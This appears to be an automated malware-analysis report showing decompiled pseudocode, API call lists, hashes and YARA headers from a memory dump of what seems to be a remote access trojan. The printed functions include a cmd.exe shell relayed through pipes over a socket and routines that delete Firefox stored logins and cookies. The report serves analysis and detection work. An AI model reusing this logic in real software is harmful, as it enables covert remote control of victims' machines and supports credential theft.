0x006d5909                      E006D5A02(_t98, _t139, _t139, "\n");
0x006d5912                      E006D1FAD( &_v40, _t139);
0x006d591e                      _t52 = E006D2489();
0x006d5932                      WriteFile( *0x73dccc, E006D1F95(_t139), _t52,  &_v8, _t98);
0x006d593d                      _t100 = _t139;
0x006d593f                      E006D5A0B(_t98, _t139, 0x72f6bc);
0x006d593f                  }
0x006d594b                  Sleep(0x64);
0x006d5951                  _t175 =  *0x73bae3 - _t98; // 0x0
0x006d5951              } while (_t175 != 0);
                        // Flag cleared: kill cmd.exe and close its process and thread handles.
0x006d5964              TerminateProcess(0x73dcd4->hProcess, _t98);
0x006d5970              CloseHandle( *0x73dcd8);
0x006d597c              CloseHandle( *0x73dcd4);
0x00000000              goto L26;
0x006d597c          }
0x006d5708      }
            }

                                    APIs
                                    • __Init_thread_footer.LIBCMT ref: 006D563C
                                      • Part of subcall function 006D4AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 006D4B18
                                    • __Init_thread_footer.LIBCMT ref: 006D5679
                                    • CreatePipe.KERNEL32(0073DCE4,0073DCCC,0073DC08,00000000,0072F6D4,00000000), ref: 006D5704
                                    • CreatePipe.KERNEL32(0073DCD0,0073DCEC,0073DC08,00000000), ref: 006D571A
                                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0073DC18,0073DCD4), ref: 006D578D
                                    • Sleep.KERNEL32(0000012C,00000093,?), ref: 006D57F4
                                    • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 006D581C
                                    • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 006D5845
                                      • Part of subcall function 006FF49E: __onexit.LIBCMT ref: 006FF4A4
                                    • WriteFile.KERNEL32(00000000,00000000,?,00000000,0073C2D0,0072F6D8,00000062,0072F6BC), ref: 006D5932
                                    • Sleep.KERNEL32(00000064,00000062,0072F6BC), ref: 006D594B
                                    • TerminateProcess.KERNEL32(00000000), ref: 006D5964
                                    • CloseHandle.KERNEL32 ref: 006D5970
                                    • CloseHandle.KERNEL32 ref: 006D597C
                                    • CloseHandle.KERNEL32 ref: 006D5992
                                    • CloseHandle.KERNEL32 ref: 006D599E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                    • String ID: SystemDrive$cmd.exe
                                    • API String ID: 2994406822-3633465311
                                    • Opcode ID: 589f8e094af703fea4b16e16888eb7a04d1ac95e7d0d43f6730355b929532828
                                    • Instruction ID: 5c422f6bf884386307849886d802852942b346f39d503ea5507244a64bb8d8ef
                                    • Opcode Fuzzy Hash: 589f8e094af703fea4b16e16888eb7a04d1ac95e7d0d43f6730355b929532828
                                    • Instruction Fuzzy Hash: 4C91E4B1E00114AFE721BB64ED969AE7BABBF44711F04902EF501A7362DFB84D01D768
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 95%
                                    			E006DA012(void* __ebx, void* __edi, void* __eflags) {
                                    				char _v28;
                                    				char _v52;
                                    				char _v76;
                                    				char _v100;
                                    				char _v124;
                                    				char _v148;
                                    				struct _WIN32_FIND_DATAA _v468;
                                    				void* __esi;
                                    				void* __ebp;
                                    				void* _t45;
                                    				signed int _t58;
                                    				signed int _t59;
                                    				signed int _t73;
                                    				signed int _t75;
                                    				char* _t108;
                                    				signed int _t109;
                                    				char* _t129;
                                    				void* _t130;
                                    				void* _t134;
                                    				void* _t135;
                                    				void* _t136;
                                    				void* _t137;
                                    
                                    				_t142 = __eflags;
                                    				_t134 = __edi;
                                    				_t89 = __ebx;
                                    				E006D20D5(__ebx,  &_v100);
                                    				E006D20D5(__ebx,  &_v76);
                                    				E006D20D5(__ebx,  &_v28);
                                    				_t45 = E006D2084(_t89,  &_v124, "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\");
                                    				E006D1FD1( &_v28, _t46, _t135, E006D75C2(_t89,  &_v52, E0070988A(_t89, __eflags, "UserProfile"), _t134, _t142, _t45));
                                    				E006D1FC7();
                                    				E006D1FC7();
                                    				_t128 =  &_v28;
                                    				_t136 = FindFirstFileA(E006D1F95(E006D7558( &_v124,  &_v28, _t142, "*")),  &_v468);
                                    				E006D1FC7();
                                    				_t143 = _t136 - 0xffffffff;
                                    				if(_t136 != 0xffffffff) {
                                    					while(1) {
                                    						L15:
                                    						__eflags = FindNextFileA(_t136,  &_v468);
                                    						if(__eflags == 0) {
                                    							break;
                                    						}
                                    						__eflags = _v468.dwFileAttributes & 0x00000010;
                                    						if((_v468.dwFileAttributes & 0x00000010) == 0) {
                                    							continue;
                                    						}
                                    						_t108 =  &(_v468.cFileName);
                                    						__eflags =  *_t108 - 0x2e;
                                    						if( *_t108 != 0x2e) {
                                    							L5:
                                    							_t129 =  &(_v468.cFileName);
                                    							_t109 = 0;
                                    							__eflags = 0;
                                    							while(1) {
                                    								_t58 =  *(_t129 + _t109) & 0x000000ff;
                                    								_t130 = "..";
                                    								__eflags = _t58 -  *((intOrPtr*)(_t130 + _t109));
                                    								_t128 =  &(_v468.cFileName);
                                    								if(_t58 !=  *((intOrPtr*)(_t130 + _t109))) {
                                    									break;
                                    								}
                                    								_t109 = _t109 + 1;
                                    								__eflags = _t109 - 3;
                                    								if(_t109 != 3) {
                                    									continue;
                                    								}
                                    								_t59 = 0;
                                    								L10:
                                    								__eflags = _t59;
                                    								if(__eflags != 0) {
                                    									E006D1FD1( &_v100, _t61, _t136, E006D5343(_t89,  &_v52, E006D7558( &_v148,  &_v28, __eflags,  &(_v468.cFileName)), _t134, __eflags, "\\logins.json"));
                                    									E006D1FC7();
                                    									E006D1FC7();
                                    									_t128 = E006D7558( &_v52,  &_v28, __eflags,  &(_v468.cFileName));
                                    									E006D1FD1( &_v76, _t67, _t136, E006D5343(_t89,  &_v148, _t67, _t134, __eflags, "\\key3.db"));
                                    									E006D1FC7();
                                    									E006D1FC7();
                                    									_t73 = DeleteFileA(E006D1F95( &_v100));
                                    									__eflags = _t73;
                                    									if(_t73 == 0) {
                                    										GetLastError();
                                    									}
                                    									_t75 = DeleteFileA(E006D1F95( &_v76));
                                    									__eflags = _t75;
                                    									if(_t75 == 0) {
                                    										GetLastError();
                                    									}
                                    								}
                                    								goto L15;
                                    							}
                                    							asm("sbb eax, eax");
                                    							_t59 = _t58 | 0x00000001;
                                    							__eflags = _t59;
                                    							goto L10;
                                    						}
                                    						__eflags =  *(_t108 + 1) & 0x000000ff;
                                    						if(( *(_t108 + 1) & 0x000000ff) == 0) {
                                    							continue;
                                    						}
                                    						goto L5;
                                    					}
                                    					E006D2084(_t89, _t137 - 0x18, "\n[Firefox StoredLogins Cleared!]");
                                    					E006DA6EF(_t89, _t128, __eflags);
                                    					FindClose(_t136);
                                    					goto L17;
                                    				} else {
                                    					FindClose(_t136);
                                    					E006D2084(_t89, _t137 - 0x18, "\n[Firefox StoredLogins not found]");
                                    					E006DA6EF(_t89,  &_v28, _t143);
                                    					L17:
                                    					E006D1FC7();
                                    					E006D1FC7();
                                    					E006D1FC7();
                                    					return 1;
                                    				}
                                    			}

                                    APIs
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 006DA091
                                    • FindClose.KERNEL32(00000000), ref: 006DA0AB
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 006DA1E2
                                    • FindClose.KERNEL32(00000000), ref: 006DA208
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Find$CloseFile$FirstNext
                                    • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                    • API String ID: 1164774033-3681987949
                                    • Opcode ID: 7c6785f462d48083c4985cefad9c3b8a7f3508a311e0eada5ced8551b487e8ea
                                    • Instruction ID: ef47312ef40db7b8f5d37e7631a97a64dfaeb6b76465ce73537bf973fca4f6a9
                                    • Opcode Fuzzy Hash: 7c6785f462d48083c4985cefad9c3b8a7f3508a311e0eada5ced8551b487e8ea
                                    • Instruction Fuzzy Hash: 7C518331E041199BCB54FBB0DC66DFDB7B6AF12300F40016FE446AA292FF745A85CA5A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 89%
                                    			E006DA22D(void* __edi, void* __eflags) {
                                    				char _v28;
                                    				char _v52;
                                    				char _v76;
                                    				char _v100;
                                    				char _v124;
                                    				struct _WIN32_FIND_DATAA _v444;
                                    				void* __ebx;
                                    				void* __esi;
                                    				void* __ebp;
                                    				void* _t35;
                                    				signed int _t56;
                                    				signed int _t57;
                                    				long _t68;
                                    				char* _t92;
                                    				signed int _t93;
                                    				void* _t102;
                                    				char* _t105;
                                    				void* _t106;
                                    				void* _t108;
                                    				void* _t109;
                                    				void* _t110;
                                    				void* _t111;
                                    
                                    				_t116 = __eflags;
                                    				_t108 = __edi;
                                    				E006D20D5(0,  &_v52);
                                    				E006D20D5(0,  &_v28);
                                    				_t35 = E006D2084(0,  &_v100, "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\");
                                    				E006D1FD1( &_v28, _t36, _t109, E006D75C2(0,  &_v76, E0070988A(0, __eflags, "UserProfile"), _t108, _t116, _t35));
                                    				E006D1FC7();
                                    				E006D1FC7();
                                    				_t104 =  &_v28;
                                    				_t110 = FindFirstFileA(E006D1F95(E006D7558( &_v100,  &_v28, _t116, "*")),  &_v444);
                                    				E006D1FC7();
                                    				_t117 = _t110 - 0xffffffff;
                                    				if(_t110 != 0xffffffff) {
                                    					__eflags = FindNextFileA(_t110,  &_v444);
                                    					if(__eflags == 0) {
                                    						L17:
                                    						E006D2084(0, _t111 - 0x18, "\n[Firefox Cookies not found]");
                                    						E006DA6EF(0, _t104, __eflags);
                                    						FindClose(_t110);
                                    						goto L18;
                                    					} else {
                                    						__eflags = 0;
                                    						do {
                                    							__eflags = _v444.dwFileAttributes & 0x00000010;
                                    							if((_v444.dwFileAttributes & 0x00000010) == 0) {
                                    								goto L16;
                                    							} else {
                                    								_t92 =  &(_v444.cFileName);
                                    								__eflags =  *_t92 - 0x2e;
                                    								if( *_t92 != 0x2e) {
                                    									L8:
                                    									_t105 =  &(_v444.cFileName);
                                    									_t93 = 0;
                                    									while(1) {
                                    										_t56 =  *(_t105 + _t93) & 0x000000ff;
                                    										_t106 = "..";
                                    										__eflags = _t56 -  *((intOrPtr*)(_t106 + _t93));
                                    										_t104 =  &(_v444.cFileName);
                                    										if(_t56 !=  *((intOrPtr*)(_t106 + _t93))) {
                                    											break;
                                    										}
                                    										_t93 = _t93 + 1;
                                    										__eflags = _t93 - 3;
                                    										if(_t93 != 3) {
                                    											continue;
                                    										} else {
                                    											_t57 = 0;
                                    										}
                                    										L13:
                                    										__eflags = _t57;
                                    										if(__eflags == 0) {
                                    											goto L16;
                                    										} else {
                                    											_t104 = E006D7558( &_v124,  &_v28, __eflags,  &(_v444.cFileName));
                                    											E006D1FD1( &_v52, _t59, _t110, E006D5343(0,  &_v76, _t59, _t108, __eflags, "\\cookies.sqlite"));
                                    											E006D1FC7();
                                    											E006D1FC7();
                                    											__eflags = DeleteFileA(E006D1F95( &_v52));
                                    											if(__eflags != 0) {
                                    												_t102 = _t111 - 0x18;
                                    												_push("\n[Firefox cookies found, cleared!]");
                                    												goto L2;
                                    											} else {
                                    												_t68 = GetLastError();
                                    												__eflags = _t68 != 0;
                                    												if(_t68 != 0) {
                                    													FindClose(_t110);
                                    												} else {
                                    													goto L16;
                                    												}
                                    											}
                                    										}
                                    										goto L19;
                                    									}
                                    									asm("sbb eax, eax");
                                    									_t57 = _t56 | 0x00000001;
                                    									__eflags = _t57;
                                    									goto L13;
                                    								} else {
                                    									__eflags =  *(_t92 + 1) & 0x000000ff;
                                    									if(( *(_t92 + 1) & 0x000000ff) == 0) {
                                    										goto L16;
                                    									} else {
                                    										goto L8;
                                    									}
                                    								}
                                    							}
                                    							goto L19;
                                    							L16:
                                    							__eflags = FindNextFileA(_t110,  &_v444);
                                    						} while (__eflags != 0);
                                    						goto L17;
                                    					}
                                    				} else {
                                    					FindClose(_t110);
                                    					_t102 = _t111 - 0x18;
                                    					_push("\n[Firefox Cookies not found]");
                                    					L2:
                                    					E006D2084(0, _t102);
                                    					E006DA6EF(0, _t104, _t117);
                                    					L18:
                                    				}
                                    				L19:
                                    				E006D1FC7();
                                    				E006D1FC7();
                                    				return 1;
                                    			}

                                    APIs
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 006DA2A5
                                    • FindClose.KERNEL32(00000000), ref: 006DA2BB
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 006DA2E5
                                    • DeleteFileA.KERNEL32(00000000,00000000), ref: 006DA38D
                                    • GetLastError.KERNEL32 ref: 006DA397
                                    • FindNextFileA.KERNEL32(00000000,00000010), ref: 006DA3AB
                                    • FindClose.KERNEL32(00000000), ref: 006DA3D1
                                    • FindClose.KERNEL32(00000000), ref: 006DA3F2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$Close$Next$DeleteErrorFirstLast
                                    • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                    • API String ID: 532992503-432212279
                                    • Opcode ID: 458b199c8c073488e0a2a43f66bb5ff85e47eb8ec2d56c606617a8a043551386
                                    • Instruction ID: 06ba5769b676951021d6f6547f0dbcadb75ee1b35aeb6a9befc2f4b8e0fcafa4
                                    • Opcode Fuzzy Hash: 458b199c8c073488e0a2a43f66bb5ff85e47eb8ec2d56c606617a8a043551386
                                    • Instruction Fuzzy Hash: 97418430E041199BCB54FBB4DC65DEDB7BBAF12300F40416FE405D6391EF685A86C696
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 76%
                                    			E00712C8E(void* __ebx, void* __edi, signed int __esi, void* __eflags, char _a4) {
                                    				signed int _v8;
                                    				signed int _v12;
                                    				int _v16;
                                    				int _v20;
                                    				int _v24;
                                    				char _v52;
                                    				int _v56;
                                    				int _v60;
                                    				signed int _v100;
                                    				char _v272;
                                    				intOrPtr _v276;
                                    				char _v280;
                                    				char _v356;
                                    				char _v360;
                                    				void* __ebp;
                                    				signed int _t65;
                                    				signed int _t72;
                                    				signed int _t74;
                                    				signed int _t78;
                                    				signed int _t85;
                                    				signed int _t89;
                                    				signed int _t91;
                                    				long _t93;
                                    				signed int* _t96;
                                    				signed int _t99;
                                    				signed int _t102;
                                    				signed int _t106;
                                    				void* _t113;
                                    				signed int _t116;
                                    				void* _t117;
                                    				void* _t119;
                                    				void* _t120;
                                    				void* _t122;
                                    				signed int _t124;
                                    				intOrPtr _t125;
                                    				signed int* _t128;
                                    				signed int _t129;
                                    				void* _t132;
                                    				void* _t134;
                                    				signed int _t135;
                                    				signed int _t137;
                                    				void* _t140;
                                    				intOrPtr _t141;
                                    				void* _t143;
                                    				signed int _t150;
                                    				signed int _t151;
                                    				signed int _t154;
                                    				signed int _t158;
                                    				signed int _t161;
                                    				intOrPtr* _t166;
                                    				signed int _t167;
                                    				intOrPtr* _t168;
                                    				void* _t169;
                                    				intOrPtr _t170;
                                    				void* _t171;
                                    				signed int _t172;
                                    				int _t176;
                                    				signed int _t178;
                                    				char** _t179;
                                    				signed int _t183;
                                    				signed int _t184;
                                    				void* _t191;
                                    				signed int _t192;
                                    				void* _t193;
                                    				signed int _t194;
                                    
                                    				_t178 = __esi;
                                    				_t171 = __edi;
                                    				_t65 = E007128CD();
                                    				_v8 = _v8 & 0x00000000;
                                    				_t137 = _t65;
                                    				_v16 = _v16 & 0x00000000;
                                    				_v12 = _t137;
                                    				if(E0071292B( &_v8) != 0 || E007128D3( &_v16) != 0) {
                                    					L46:
                                    					_push(0);
                                    					_push(0);
                                    					_push(0);
                                    					_push(0);
                                    					_push(0);
                                    					E0070698A();
                                    					asm("int3");
                                    					_t191 = _t193;
                                    					_t194 = _t193 - 0x10;
                                    					_push(_t137);
                                    					_t179 = E007128CD();
                                    					_v52 = 0;
                                    					_v56 = 0;
                                    					_v60 = 0;
                                    					_t72 = E0071292B( &_v52);
                                    					_t143 = _t178;
                                    					__eflags = _t72;
                                    					if(_t72 != 0) {
                                    						L66:
                                    						_push(0);
                                    						_push(0);
                                    						_push(0);
                                    						_push(0);
                                    						_push(0);
                                    						E0070698A();
                                    						asm("int3");
                                    						_push(_t191);
                                    						_t192 = _t194;
                                    						_t74 =  *0x73a00c; // 0x941617c6
                                    						_v100 = _t74 ^ _t192;
                                    						 *0x73a344 =  *0x73a344 | 0xffffffff;
                                    						 *0x73a338 =  *0x73a338 | 0xffffffff;
                                    						_push(0);
                                    						_push(_t179);
                                    						_push(_t171);
                                    						_t139 = "TZ";
                                    						_t172 = 0;
                                    						 *0x73b748 = 0;
                                    						_t78 = E00709895(__eflags,  &_v360,  &_v356, 0x100, "TZ");
                                    						__eflags = _t78;
                                    						if(_t78 != 0) {
                                    							__eflags = _t78 - 0x22;
                                    							if(_t78 == 0x22) {
                                    								_t184 = E0070F98C(_t143, _v276);
                                    								__eflags = _t184;
                                    								if(__eflags != 0) {
                                    									_t85 = E00709895(__eflags,  &_v280, _t184, _v276, _t139);
                                    									__eflags = _t85;
                                    									if(_t85 == 0) {
                                    										E007101F5(0);
                                    										_t172 = _t184;
                                    									} else {
                                    										_push(_t184);
                                    										goto L72;
                                    									}
                                    								} else {
                                    									_push(0);
                                    									L72:
                                    									E007101F5();
                                    								}
                                    							}
                                    						} else {
                                    							_t172 =  &_v272;
                                    						}
                                    						asm("sbb esi, esi");
                                    						_t183 =  ~(_t172 -  &_v272) & _t172;
                                    						__eflags = _t172;
                                    						if(_t172 == 0) {
                                    							L80:
                                    							L47();
                                    						} else {
                                    							__eflags =  *_t172;
                                    							if(__eflags == 0) {
                                    								goto L80;
                                    							} else {
                                    								_push(_t172);
                                    								E00712C8E(_t139, _t172, _t183, __eflags);
                                    							}
                                    						}
                                    						E007101F5(_t183);
                                    						__eflags = _v16 ^ _t192;
                                    						return E006FFD1B(_v16 ^ _t192);
                                    					} else {
                                    						_t89 = E007128D3( &_v16);
                                    						_pop(_t143);
                                    						__eflags = _t89;
                                    						if(_t89 != 0) {
                                    							goto L66;
                                    						} else {
                                    							_t91 = E007128FF( &_v20);
                                    							_pop(_t143);
                                    							__eflags = _t91;
                                    							if(_t91 != 0) {
                                    								goto L66;
                                    							} else {
                                    								E007101F5( *0x73b740);
                                    								 *0x73b740 = 0;
                                    								 *_t194 = 0x73b750;
                                    								_t93 = GetTimeZoneInformation(??);
                                    								__eflags = _t93 - 0xffffffff;
                                    								if(_t93 != 0xffffffff) {
                                    									_t150 =  *0x73b750 * 0x3c;
                                    									_t167 =  *0x73b7a4; // 0x0
                                    									_push(_t171);
                                    									 *0x73b748 = 1;
                                    									_v12 = _t150;
                                    									__eflags =  *0x73b796; // 0x0
                                    									if(__eflags != 0) {
                                    										_t151 = _t150 + _t167 * 0x3c;
                                    										__eflags = _t151;
                                    										_v12 = _t151;
                                    									}
                                    									__eflags =  *0x73b7ea; // 0x0
                                    									if(__eflags == 0) {
                                    										L56:
                                    										_v16 = 0;
                                    										_v20 = 0;
                                    									} else {
                                    										_t106 =  *0x73b7f8; // 0x0
                                    										__eflags = _t106;
                                    										if(_t106 == 0) {
                                    											goto L56;
                                    										} else {
                                    											_v16 = 1;
                                    											_v20 = (_t106 - _t167) * 0x3c;
                                    										}
                                    									}
                                    									_t176 = E0070F55B(0, _t167);
                                    									_t99 = WideCharToMultiByte(_t176, 0, 0x73b754, 0xffffffff,  *_t179, 0x3f, 0,  &_v24);
                                    									__eflags = _t99;
                                    									if(_t99 == 0) {
                                    										L60:
                                    										 *( *_t179) = 0;
                                    									} else {
                                    										__eflags = _v24;
                                    										if(_v24 != 0) {
                                    											goto L60;
                                    										} else {
                                    											( *_t179)[0x3f] = 0;
                                    										}
                                    									}
                                    									_t102 = WideCharToMultiByte(_t176, 0, 0x73b7a8, 0xffffffff, _t179[1], 0x3f, 0,  &_v24);
                                    									__eflags = _t102;
                                    									if(_t102 == 0) {
                                    										L64:
                                    										 *(_t179[1]) = 0;
                                    									} else {
                                    										__eflags = _v24;
                                    										if(_v24 != 0) {
                                    											goto L64;
                                    										} else {
                                    											_t179[1][0x3f] = 0;
                                    										}
                                    									}
                                    								}
                                    								 *(E007128C7()) = _v12;
                                    								 *((intOrPtr*)(E007128BB())) = _v16;
                                    								_t96 = E007128C1();
                                    								 *_t96 = _v20;
                                    								return _t96;
                                    							}
                                    						}
                                    					}
                                    				} else {
                                    					_t168 =  *0x73b740; // 0x0
                                    					_t8 =  &_a4; // 0x71307e
                                    					_t178 =  *_t8;
                                    					if(_t168 == 0) {
                                    						L12:
                                    						E007101F5(_t168);
                                    						_t154 = _t178;
                                    						_t169 = _t154 + 1;
                                    						do {
                                    							_t113 =  *_t154;
                                    							_t154 = _t154 + 1;
                                    						} while (_t113 != 0);
                                    						 *0x73b740 = E0070F98C(_t154 - _t169, _t154 - _t169 + 1);
                                    						_t116 = E007101F5(0);
                                    						_t170 =  *0x73b740; // 0x0
                                    						if(_t170 == 0) {
                                    							goto L45;
                                    						} else {
                                    							_t158 = _t178;
                                    							_push(_t171);
                                    							_t171 = _t158 + 1;
                                    							do {
                                    								_t117 =  *_t158;
                                    								_t158 = _t158 + 1;
                                    							} while (_t117 != 0);
                                    							_t159 = _t158 - _t171;
                                    							_t119 = E00711916(_t170, _t158 - _t171 + 1, _t178);
                                    							_t193 = _t193 + 0xc;
                                    							if(_t119 == 0) {
                                    								_t171 = 3;
                                    								_push(_t171);
                                    								_t120 = E0071D309(_t159,  *_t137, 0x40, _t178);
                                    								_t193 = _t193 + 0x10;
                                    								if(_t120 == 0) {
                                    									while( *_t178 != 0) {
                                    										_t178 = _t178 + 1;
                                    										_t171 = _t171 - 1;
                                    										if(_t171 != 0) {
                                    											continue;
                                    										}
                                    										break;
                                    									}
                                    									_pop(_t171);
                                    									_t137 = _t137 & 0xffffff00 |  *_t178 == 0x0000002d;
                                    									if(_t137 != 0) {
                                    										_t178 = _t178 + 1;
                                    									}
                                    									_t161 = E00706769(_t159, _t178) * 0xe10;
                                    									_v8 = _t161;
                                    									while(1) {
                                    										_t122 =  *_t178;
                                    										if(_t122 != 0x2b && (_t122 < 0x30 || _t122 > 0x39)) {
                                    											break;
                                    										}
                                    										_t178 = _t178 + 1;
                                    									}
                                    									__eflags =  *_t178 - 0x3a;
                                    									if( *_t178 == 0x3a) {
                                    										_t178 = _t178 + 1;
                                    										_t161 = _v8 + E00706769(_t161, _t178) * 0x3c;
                                    										_v8 = _t161;
                                    										while(1) {
                                    											_t132 =  *_t178;
                                    											__eflags = _t132 - 0x30;
                                    											if(_t132 < 0x30) {
                                    												break;
                                    											}
                                    											__eflags = _t132 - 0x39;
                                    											if(_t132 <= 0x39) {
                                    												_t178 = _t178 + 1;
                                    												__eflags = _t178;
                                    												continue;
                                    											}
                                    											break;
                                    										}
                                    										__eflags =  *_t178 - 0x3a;
                                    										if( *_t178 == 0x3a) {
                                    											_t178 = _t178 + 1;
                                    											_t161 = _v8 + E00706769(_t161, _t178);
                                    											_v8 = _t161;
                                    											while(1) {
                                    												_t134 =  *_t178;
                                    												__eflags = _t134 - 0x30;
                                    												if(_t134 < 0x30) {
                                    													goto L38;
                                    												}
                                    												__eflags = _t134 - 0x39;
                                    												if(_t134 <= 0x39) {
                                    													_t178 = _t178 + 1;
                                    													__eflags = _t178;
                                    													continue;
                                    												}
                                    												goto L38;
                                    											}
                                    										}
                                    									}
                                    									L38:
                                    									__eflags = _t137;
                                    									if(_t137 != 0) {
                                    										_v8 = _t161;
                                    									}
                                    									__eflags =  *_t178;
                                    									_t124 = 0 |  *_t178 != 0x00000000;
                                    									_v16 = _t124;
                                    									__eflags = _t124;
                                    									_t27 =  &_v12; // 0x71307e
                                    									_t125 =  *_t27;
                                    									if(_t124 == 0) {
                                    										 *((char*)( *((intOrPtr*)(_t125 + 4)))) = 0;
                                    										L44:
                                    										 *(E007128C7()) = _v8;
                                    										_t128 = E007128BB();
                                    										 *_t128 = _v16;
                                    										return _t128;
                                    									}
                                    									_push(3);
                                    									_t129 = E0071D309(_t161,  *((intOrPtr*)(_t125 + 4)), 0x40, _t178);
                                    									_t193 = _t193 + 0x10;
                                    									__eflags = _t129;
                                    									if(_t129 == 0) {
                                    										goto L44;
                                    									}
                                    								}
                                    							}
                                    							goto L46;
                                    						}
                                    					} else {
                                    						_t166 = _t168;
                                    						_t135 = _t178;
                                    						while(1) {
                                    							_t140 =  *_t135;
                                    							if(_t140 !=  *_t166) {
                                    								break;
                                    							}
                                    							if(_t140 == 0) {
                                    								L8:
                                    								_t116 = 0;
                                    							} else {
                                    								_t141 =  *((intOrPtr*)(_t135 + 1));
                                    								if(_t141 !=  *((intOrPtr*)(_t166 + 1))) {
                                    									break;
                                    								} else {
                                    									_t135 = _t135 + 2;
                                    									_t166 = _t166 + 2;
                                    									if(_t141 != 0) {
                                    										continue;
                                    									} else {
                                    										goto L8;
                                    									}
                                    								}
                                    							}
                                    							L10:
                                    							if(_t116 == 0) {
                                    								L45:
                                    								return _t116;
                                    							} else {
                                    								_t11 =  &_v12; // 0x71307e
                                    								_t137 =  *_t11;
                                    								goto L12;
                                    							}
                                    							goto L82;
                                    						}
                                    						asm("sbb eax, eax");
                                    						_t116 = _t135 | 0x00000001;
                                    						__eflags = _t116;
                                    						goto L10;
                                    					}
                                    				}
                                    				L82:
                                    			}
                                    0x00712d68
                                    0x00712d70
                                    0x00712d71
                                    0x00712d77
                                    0x00712d7c
                                    0x00712d81
                                    0x00712d87
                                    0x00712d8c
                                    0x00712d8d
                                    0x00712d90
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00712d90
                                    0x00712d95
                                    0x00712d96
                                    0x00712d9b
                                    0x00712d9d
                                    0x00712d9d
                                    0x00712da5
                                    0x00712dab
                                    0x00712dae
                                    0x00712dae
                                    0x00712db2
                                    0x00000000
                                    0x00000000
                                    0x00712dbc
                                    0x00712dbc
                                    0x00712dbf
                                    0x00712dc2
                                    0x00712dc4
                                    0x00712dd2
                                    0x00712dd4
                                    0x00712dde
                                    0x00712dde
                                    0x00712de0
                                    0x00712de2
                                    0x00000000
                                    0x00000000
                                    0x00712dd9
                                    0x00712ddb
                                    0x00712ddd
                                    0x00712ddd
                                    0x00000000
                                    0x00712ddd
                                    0x00000000
                                    0x00712ddb
                                    0x00712de4
                                    0x00712de7
                                    0x00712de9
                                    0x00712df4
                                    0x00712df6
                                    0x00712e00
                                    0x00712e00
                                    0x00712e02
                                    0x00712e04
                                    0x00000000
                                    0x00000000
                                    0x00712dfb
                                    0x00712dfd
                                    0x00712dff
                                    0x00712dff
                                    0x00000000
                                    0x00712dff
                                    0x00000000
                                    0x00712dfd
                                    0x00712e00
                                    0x00712de7
                                    0x00712e06
                                    0x00712e06
                                    0x00712e08
                                    0x00712e0c
                                    0x00712e0c
                                    0x00712e11
                                    0x00712e13
                                    0x00712e16
                                    0x00712e19
                                    0x00712e1b
                                    0x00712e1b
                                    0x00712e1e
                                    0x00712e39
                                    0x00712e3c
                                    0x00712e44
                                    0x00712e49
                                    0x00712e4e
                                    0x00000000
                                    0x00712e4e
                                    0x00712e20
                                    0x00712e28
                                    0x00712e2d
                                    0x00712e30
                                    0x00712e32
                                    0x00000000
                                    0x00000000
                                    0x00712e34
                                    0x00712d81
                                    0x00000000
                                    0x00712d68
                                    0x00712cdb
                                    0x00712cdb
                                    0x00712cdd
                                    0x00712cdf
                                    0x00712cdf
                                    0x00712ce3
                                    0x00000000
                                    0x00000000
                                    0x00712ce7
                                    0x00712cfb
                                    0x00712cfb
                                    0x00712ce9
                                    0x00712ce9
                                    0x00712cef
                                    0x00000000
                                    0x00712cf1
                                    0x00712cf1
                                    0x00712cf4
                                    0x00712cf9
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00712cf9
                                    0x00712cef
                                    0x00712d04
                                    0x00712d06
                                    0x00712e55
                                    0x00712e55
                                    0x00712d0c
                                    0x00712d0c
                                    0x00712d0c
                                    0x00000000
                                    0x00712d0c
                                    0x00000000
                                    0x00712d06
                                    0x00712cff
                                    0x00712d01
                                    0x00712d01
                                    0x00000000
                                    0x00712d01
                                    0x00712cd9
                                    0x00000000

                                    APIs
                                    • _free.LIBCMT ref: 00712D10
                                    • _free.LIBCMT ref: 00712D34
                                    • _free.LIBCMT ref: 00712EBB
                                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0072913C), ref: 00712ECD
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0073B754,000000FF,00000000,0000003F,00000000,?,?), ref: 00712F45
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0073B7A8,000000FF,?,0000003F,00000000,?), ref: 00712F72
